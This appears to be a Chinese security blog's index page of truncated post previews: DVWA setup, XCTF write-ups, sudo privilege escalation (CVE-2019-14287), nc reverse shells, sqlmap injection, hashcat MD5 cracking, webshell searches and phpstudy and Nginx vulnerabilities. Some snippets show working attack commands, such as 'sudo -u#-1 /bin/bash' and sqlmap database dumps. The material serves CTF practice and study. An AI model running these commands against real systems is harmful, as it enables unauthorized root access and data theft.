原创 phpstudy+dvwa搭建

簡單記錄一下過去自己搭建dvwa的過程,希望可以幫到大家。和之前寫的xampp搭建差不多,只不過環境不一樣罷了 一、下載phpstudy,默認安裝(本實驗使用的是phpstudy2018),這裏演示我默認安裝在C盤,大家可以自行修

原创 XCTF-高手進階區:bug

題目: 進去後發現如下所示: 我註冊了一個peak賬號,登錄後顯示如下: 經過一番測試,發現Manage需要admin權限: 如何獲取admin權限呢?利用修改密碼界面的邏輯漏洞,修改admin的密碼,如下: 再次點擊M

原创 常用查殺端口命令

Linux 1、netstat (1)常用參數簡介 -a或–all 顯示所有連線中的Socket -n或–numeric 直接使用IP地址,而不通過域名服務器 -p或–programs 顯示正在使用Socket的程序識別碼和程序

原创 XCTF-高手進階區:ics-07

題目 發現view-source <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <

原创 XCTF-高手進階區:ics-04

題目: 解題思路: 注入點在忘記密碼處,使用sqlmap一把梭 sqlmap -r 1.txt --dbs --batch sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C

原创 XCTF-高手進階區:i-got-id-200

題目 三個文件,都是perl寫的,Files存在上傳文件,它會將上傳的文件內容打印出來 沒接觸過perl,看了別人的wp,就簡單說一下,以後學了perl再來回味 因爲它會將上傳的文件內容打印出來,所以猜測後臺存在param(

原创 Linux提權:常用三種方法

一、sudo提權(CVE-2019-14287) #以root身份執行命令: sudo -u#-1 id sudo -u#4294967259 cat /flag #以root身份登錄: sudo -u#-1 /bin/bash

原创 nc——製作後門連接與反彈shell連接的使用

一、nc參數 -g<網關> 設置路由器躍程通信網關,最多可設置8個 -G<指向器數目> 設置來源路由指向器,其數值爲4的倍數 -h 在線幫助 -i<延遲秒數> 設置時間間隔,以便傳送信息及掃描通信端口 -l 使用監聽模式,管控傳

原创 hashcat離線碰撞md5

hashcat --force -a 0 -m 0 1.txt -o result.txt /usr/share/wordlists/metasploit/default_pass_for_services_unhash.txt

原创 Python:for循環+else與continue+break小總結

以往的筆記,記錄一下 前言 一、for循環簡介: for i in xx,表示i依次一個個將xx裏面的值取出來 二、for…else… 1、簡介: for也可以和else使用 什麼時候用這個else? 當for j in xx

原创 Linux與Windows文件查找命令

Linux 查詢文件名: find / -name xx 查找有無一句話木馬: grep -rn 'eval(' 路徑 grep -rn --include=*.php 'eval(' 路徑 Windows 查找文件名,win

原创 php外部系統命令執行函數

總結一下php中常用的執行函數,一篇水文 一、system()函數 (PHP 4, PHP 5, PHP 7) 介紹:執行外部程序,並且顯示輸出 說明 system( string $command[, int &

原创 phpstudy後門漏洞復現

筆記 前言 如果服務器是用phpstudy2016或phpstudy2018搭建的,那麼就有可能存在後門 發現漏洞 後門代碼在phpStudy2016和phpStudy2018的php-5.2.17或php-5.4.45的\e

原创 文件解析漏洞總結-Nginx

Nginx解析漏洞 原理:在任意文件名後面添加如/*.php,nginx都會將該文件當做php文件類型,交給php去解析執行 例:xx.jpg,其中源碼爲<?php phpinfo();?> 訪問xx.jpg時,在xx.jpg後面